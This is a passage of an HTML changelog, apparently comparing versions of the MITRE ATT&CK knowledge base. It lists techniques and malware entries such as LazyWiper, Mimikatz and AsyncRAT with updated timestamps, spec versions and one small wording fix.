collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:16.405000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1692] Unauthorized Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:54:29.294000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr></tbody></table></details><hr><h4>[T0859] Valid Accounts</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 19:59:08.866000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1695.003] Block Communications: Wi-Fi</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 19:59:42.404000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr></tbody></table></details></details><h2>Software</h2><h3>enterprise-attack</h3><details><summary>Minor Version Changes</summary><hr><h4>[S9039] LazyWiper</h4><p><b>Current version</b>: 1.1</p><p><b>Version changed from</b>: 1.0 → 1.1</p>
+    <table class="diff" id="difflib_chg_to1__top"
+           cellspacing="0" cellpadding="0" rules="groups" >
+        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
+        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
+        <thead><tr><th class="diff_next"><br /></th><th colspan="2" class="diff_header">Old Description</th><th class="diff_next"><br /></th><th colspan="2" class="diff_header">New Description</th></tr></thead>
+        <tbody>
+            <tr><td class="diff_next" id="difflib_chg_to1__0"><a href="#difflib_chg_to1__top">t</a></td><td class="diff_header" id="from1_1">1</td><td nowrap="nowrap">[LazyWiper](https://attack.mitre.org/software/S9039)&nbsp;is&nbsp;a&nbsp;de</td><td class="diff_next"><a href="#difflib_chg_to1__top">t</a></td><td class="diff_header" id="to1_1">1</td><td nowrap="nowrap">[LazyWiper](https://attack.mitre.org/software/S9039)&nbsp;is&nbsp;a&nbsp;de</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">structive&nbsp;malware&nbsp;observed&nbsp;targeting&nbsp;a&nbsp;manufacturing&nbsp;sector&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">structive&nbsp;malware&nbsp;observed&nbsp;targeting&nbsp;a&nbsp;manufacturing&nbsp;sector&nbsp;</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">company&nbsp;during&nbsp;the&nbsp;[2025&nbsp;Poland&nbsp;Wiper&nbsp;Attacks](https://attac</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">company&nbsp;during&nbsp;the&nbsp;[2025&nbsp;Poland&nbsp;Wiper&nbsp;Attacks](https://attac</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">k.mitre.org/campaigns/C0063).&nbsp;[LazyWiper](https://attack.mit</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">k.mitre.org/campaigns/C0063).&nbsp;[LazyWiper](https://attack.mit</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">re.org/software/S9039)&nbsp;is&nbsp;a&nbsp;native&nbsp;Windows&nbsp;PowerShell&nbsp;script</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">re.org/software/S9039)&nbsp;is&nbsp;a&nbsp;native&nbsp;Windows&nbsp;PowerShell&nbsp;script</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;that&nbsp;is&nbsp;believed&nbsp;to&nbsp;have&nbsp;been&nbsp;generated&nbsp;by&nbsp;a&nbsp;large&nbsp;language</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;that&nbsp;is&nbsp;believed&nbsp;to&nbsp;have&nbsp;been&nbsp;generated&nbsp;by&nbsp;a&nbsp;large&nbsp;language</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;model&nbsp;(LLM).&nbsp;[LazyWiper](https://attack.mitre.org/software/</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;model&nbsp;(LLM).&nbsp;[LazyWiper](https://attack.mitre.org/software/</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">S9039)&nbsp;overwrites&nbsp;files&nbsp;on&nbsp;the&nbsp;system&nbsp;using&nbsp;the&nbsp;C#&nbsp;function&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">S9039)&nbsp;overwrites&nbsp;files&nbsp;on&nbsp;the&nbsp;system&nbsp;using&nbsp;the&nbsp;C#&nbsp;function&nbsp;</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">`WriteRandomBytes()`&nbsp;and&nbsp;can&nbsp;target<span class="diff_chg">s&nbsp;multiple&nbsp;specific&nbsp;file&nbsp;</span></td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">`WriteRandomBytes()`&nbsp;and&nbsp;can&nbsp;target<span class="diff_chg">&nbsp;multiple&nbsp;specific&nbsp;file&nbsp;t</span></td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap"><span class="diff_chg">types</span>&nbsp;by&nbsp;their&nbsp;extensions.(Citation:&nbsp;CERT&nbsp;Polska)</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap"><span class="diff_chg">ypes</span>&nbsp;by&nbsp;their&nbsp;extensions.(Citation:&nbsp;CERT&nbsp;Polska)</td></tr>
+        </tbody>
+    </table><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 15:08:43.762000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>description</td><td style='border: 1px solid black;border-collapse: collapse;'>[LazyWiper](https://attack.mitre.org/software/S9039) is a destructive malware observed targeting a manufacturing sector company during the [2025 Poland Wiper Attacks](https://attack.mitre.org/campaigns/C0063). [LazyWiper](https://attack.mitre.org/software/S9039) is a native Windows PowerShell script that is believed to have been generated by a large language model (LLM). [LazyWiper](https://attack.mitre.org/software/S9039) overwrites files on the system using the C# function `WriteRandomBytes()` and can targets multiple specific file types by their extensions.(Citation: CERT Polska)</td><td style='border: 1px solid black;border-collapse: collapse;'>[LazyWiper](https://attack.mitre.org/software/S9039) is a destructive malware observed targeting a manufacturing sector company during the [2025 Poland Wiper Attacks](https://attack.mitre.org/campaigns/C0063). [LazyWiper](https://attack.mitre.org/software/S9039) is a native Windows PowerShell script that is believed to have been generated by a large language model (LLM). [LazyWiper](https://attack.mitre.org/software/S9039) overwrites files on the system using the C# function `WriteRandomBytes()` and can target multiple specific file types by their extensions.(Citation: CERT Polska)</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_version</td><td style='border: 1px solid black;border-collapse: collapse;'>1.0</td><td style='border: 1px solid black;border-collapse: collapse;'>1.1</td></tr></tbody></table></details></details><details><summary>Patches</summary><hr><h4>[S1025] Amadey</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-05-07 19:11:33.669000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S0099] Arp</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 20:59:19.130000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S9031] AshTag</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 14:04:58.202000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr></tbody></table></details><hr><h4>[S1087] AsyncRAT</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-10-10 17:19:12.868000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S0245] BADCALL</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-25 14:44:12.926000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S0190] BITSAdmin</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 14:09:31.571000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S1161] BPFDoor</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-01-03 18:03:04.670000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.737000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S0414] BabyShark</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-05-06 20:38:32.432000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S1181] BlackByte 2.0 Ransomware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-03-09 16:01:39.889000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S9016] Caminho</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 17:54:24.028000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr></tbody></table></details><hr><h4>[S0687] Cyclops Blink</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 19:46:35.048000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S9017] DCRAT</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 18:27:09.265000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S0334] DarkComet</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-25 14:43:20.605000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S1111] DarkGate</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 03:02:05.582000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.735000+00:00</td></tr></tbody></table></details><hr><h4>[S1144] FRP</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-19 16:36:54.302000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S0132] H1N1</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-25 14:45:07.358000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S0246] HARDRAIN</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-25 14:44:34.161000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S1229] Havoc</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 12:17:28.794000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr></tbody></table></details><hr><h4>[S9023] HiddenFace</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 02:31:26.041000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr></tbody></table></details><hr><h4>[S0357] Impacket</h4><p><b>Current version</b>: 1.8</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-04 17:16:12.597000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[S0604] Industroyer</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 14:11:53.057000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr></tbody></table></details><hr><h4>[S9029] IronWind</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 00:32:35.569000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details><hr><h4>[S9035] LAMEHUG</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 23:56:18.785000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr></tbody></table></details><hr><h4>[S9020] LODEINFO</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 02:29:49.185000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.735000+00:00</td></tr></tbody></table></details><hr><h4>[S0372] LockerGoga</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 22:21:12.036000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr></tbody></table></details><hr><h4>[S0500] MCMD</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 14:07:56.328000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S0002] Mimikatz</h4><p><b>Current version</b>: 1.11</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-19 18:13:24.015000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.740000+00:00</td></tr></tbody></table></details><hr><h4>[S9025] NOOPLDR</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 